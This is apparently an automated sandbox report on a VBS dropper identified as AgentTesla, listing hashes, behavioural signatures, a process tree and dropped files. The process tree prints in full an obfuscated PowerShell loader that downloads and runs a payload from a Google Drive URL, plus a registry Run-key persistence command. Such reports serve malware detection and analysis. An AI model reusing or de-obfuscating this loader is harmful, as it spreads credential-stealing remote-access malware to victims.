Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-06-2024 14:56

General

  • Target

    09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs

  • Size

    91KB

  • MD5

    44d9ad2f0db6d4cb899d6657974c817b

  • SHA1

    1a76e0f99bffc9a92c8578f87538f2efb2b94ec9

  • SHA256

    09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19

  • SHA512

    09b6a077beed527f4756d9d20f696a66976537e1fcef947fa29ac8e8f9c761be83297a07920e050f4df1ca16d41b11b51298d9d72f45ad352e5166fd95a68c8b

  • SSDEEP

    1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5XRyz29KWFj:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMZ

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? 
Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] 
Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. 
Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 
'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
        3⤵
          PID:3420
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? 
Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] 
Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. 
Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 
'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4232
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
            4⤵
              PID:632
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3412
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3312
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1704
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:4648

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          4KB

          MD5

          23da8c3612b391292f5cdc51f7bcb018

          SHA1

          eb345ba5705c1e629c8c44198b812619229693d3

          SHA256

          6cbc26e82f2a553f9828216b6851b859f57f05df2350666818965cd1e0064a28

          SHA512

          612c76f6045e861bbe0554ac69a57357bcfd68dbab0954e78db1009d5a71e551704880847f146dc43f934d4a8ce9d5e9b4b163a8acdb5401f44a2ef65ee790e7

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          4KB

          MD5

          712c85f7347b1b9f2288a220c96b841e

          SHA1

          790e35b7d500cea6961c44011d958a2013768378

          SHA256

          70187e88c8446bdaa3eb7ea3bfc0db33c1f2e9641b5db95d0fa22dad724eb981

          SHA512

          1881a8c4156b12745c414736b68b21df4113dbf9c2744b04d6bbfe7dbc7f7336293b5cdc8008eafb59afa4314affec831d83d6d3b34d3e36b25d831e40cdd972

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          446B

          MD5

          4b9bc21c7f74f2fd1c8ef11ea8c09490

          SHA1

          296a36eb7687b0436228329baa38f0256f13cd4d

          SHA256

          254427b2bba5cc34f90ad8877a55e16062511b746870497c596a215d2e3eb949

          SHA512

          ed794cc51a27af7a6e571f68b854f1ac004c16c943939863e7a51e3dae449425f45d78445bfd24710823481ce4acfc61c92d639a4b14da52f67d1f41455f464a

        • C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

          Filesize

          3KB

          MD5

          62848a3b8e3b67b5b36a517ad40a402a

          SHA1

          31db8d0589625d582c55a87c7877fcaa8c1b19ff

          SHA256

          e070df27506a03e268388353f1de976f4e7c9c5ab152a48d8dc80f87c78ddd4e

          SHA512

          912cc731a569a3ee5c0f8c1f902c76f358e8366385f24d9bb59f8fffc530c408f7429c67dc3dab05b280f1903a8cc9fec6c927cd7c5daa3b27a1beb4a278a6ac

